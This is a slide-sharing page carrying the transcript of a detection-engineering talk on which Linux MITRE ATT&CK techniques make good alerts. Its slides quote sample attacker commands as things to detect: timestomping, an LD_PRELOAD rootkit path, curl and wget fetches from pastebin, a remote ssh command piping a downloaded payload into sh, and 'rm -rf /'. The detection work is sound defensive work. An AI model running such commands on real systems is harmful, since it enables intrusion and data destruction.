Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Alertable Techniques for Linux using MITRE ATT&CK

Tony M Lambert
October 29, 2019
Technology
1
2.2k

Alertable Techniques for Linux using MITRE ATT&CK

Community members continually ask, should I have detection capabilities across every technique in ATT&CK? This question inevitably leads to the same conclusion that not every technique is alertable and not all of them provide the same value for immediate detection. In this session we’ll discuss the concept of alertable detections using Linux ATT&CK techniques as a case study. We’ll introduce decision criteria we’ve learned through experience to illustrate the challenges, and we’ll recommend specific techniques that work well with an alert-driven workflow.

Tony M Lambert

October 29, 2019
Tweet

More Decks by Tony M Lambert

See All by Tony M Lambert
The Wild World of macOS Installers
forensicitguy
0
33
Whitelisting LD_PRELOAD For Fun and No Profit
forensicitguy
0
370
Spotting Lateral Movement - BSides Augusta 2019
forensicitguy
1
930
Intelligence Driven Testing with Atomic Red Team
forensicitguy
2
390
Spotting Lateral Movement with Endpoint Data
forensicitguy
2
580

Other Decks in Technology

See All in Technology
rootlessコンテナのすゝめ - 研究室サーバーでもできる安全なコンテナ管理
kitsuya0828
3
390
SRE×AIOpsを始めよう!GuardDutyによるお手軽脅威検出
amixedcolor
0
180
Exadata Database Service on Dedicated Infrastructure(ExaDB-D) UI スクリーン・キャプチャ集
oracle4engineer
PRO
2
3.2k
New Relicを活用したSREの最初のステップ / NRUG OKINAWA VOL.3
isaoshimizu
3
630
100 名超が参加した日経グループ横断の競技型 AWS 学習イベント「Nikkei Group AWS GameDay」の紹介/mediajaws202411
nikkei_engineer_recruiting
1
170
これまでの計測・開発・デプロイ方法全部見せます! / Findy ISUCON 2024-11-14
tohutohu
3
370
DynamoDB でスロットリングが発生したとき_大盛りver/when_throttling_occurs_in_dynamodb_long
emiki
1
430
アジャイルチームがらしさを発揮するための目標づくり / Making the goal and enabling the team
kakehashi
3
150
第1回 国土交通省 データコンペ参加者向け勉強会③ - Snowflake x estie編 -
estie
0
130
AWS Lambda のトラブルシュートをしていて思うこと
kazzpapa3
2
180
適材適所の技術選定 〜GraphQL・REST API・tRPC〜 / Optimal Technology Selection
kakehashi
1
700
【Startup CTO of the Year 2024 / Audience Award】アセンド取締役CTO 丹羽健
niwatakeru
0
1.3k

Featured

See All Featured
ReactJS: Keep Simple. Everything can be a component!
pedronauck
665
120k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
329
21k
A Tale of Four Properties
chriscoyier
156
23k
A better future with KSS
kneath
238
17k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
28
8.2k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
Bash Introduction
62gerente
608
210k
The Cost Of JavaScript in 2023
addyosmani
45
6.8k
Raft: Consensus for Rubyists
vanstee
136
6.6k
Git: the NoSQL Database
bkeepers
PRO
427
64k
Music & Morning Musume
bryan
46
6.2k
Optimising Largest Contentful Paint
csswizardry
33
2.9k

Transcript

  1. Alertable Techniques for Linux Using MITRE ATT&CK™

  2. ▪ Find & detect adversaries using data ▪ Recovering system

    administrator ▪ Love to teach, hate to grade homework Tony Lambert Detection Engineer/Intel Red Canary @ForensicITGuy id -un

  3. ▪ What’s an alertable technique? ▪ Decision criteria for alerting

    ▪ The good, the bad, and the ugly Overview

  4. ▪ Notification of abnormal condition ▪ Requires context for triage

    ▪ Requires care and feeding for efficacy What’s an alert?

  5. Alert Workflow Condition occurs 1 Defender investigates 2 3 4

    Alert fires Escalate or hide

  6. ▪ High volume by default ▪ Lack of context Problems

    with Alerts

  7. Decision Criteria for Alerts ▪ Time to investigate (lower is

    better) ▪ Significance of abnormality (urgent is better) ▪ Time to respond (lower is better)

  8. Alerts that don’t suck

  9. Timestomping (T1099) touch -acmr /bin/sh /file/to/timestomp ▪ Quick to investigate

    ▪ Significant destruction of evidence

  10. Process Injection (T1055) /etc/ld.so.preload LD_PRELOAD=/tmp/evil.so ▪ Quick to respond ▪

    Used by rootkits, affects user tools

  11. Masquerading (T1036) /tmp/kworkerds /dev/shm/kthreadds ▪ Quick to investigate ▪ Signals

    significant abnormality

  12. We can make these work...

  13. Remote File Copy (T1105) curl https://pastebin.com/evilThing wget http://<ip address>/mirai.x86 ▪

    Requires much tuning ▪ Hunt for outliers in command line

  14. Remote Services (T1021) ssh … [email protected] '(curl hxxps://pastebin.com/payload | sh'

    ▪ Tune out deployment tools ▪ Significant for lateral movement

  15. Worst. Alerts. Ever.

  16. Anything Discovery whoami, netstat, ifconfig, etc. ▪ OS noise makes

    high volume ▪ Better for cluster analysis

  17. Sudo (T1169) sudo ./make_sandwich.sh ▪ Long investigations with little return

    ▪ Better for reporting/audits

  18. File Deletion (T1107) rm -rf / ▪ Probably non-functional rule

    ▪ Helpdesk will know before the alert

  19. Alert where possible, report/hunt otherwise REDCANARY.COM/BLOG

  20. Q & A https://github.com/bfuzzy1/auditd-attack https://github.com/Neo23x0/auditd RESOURCES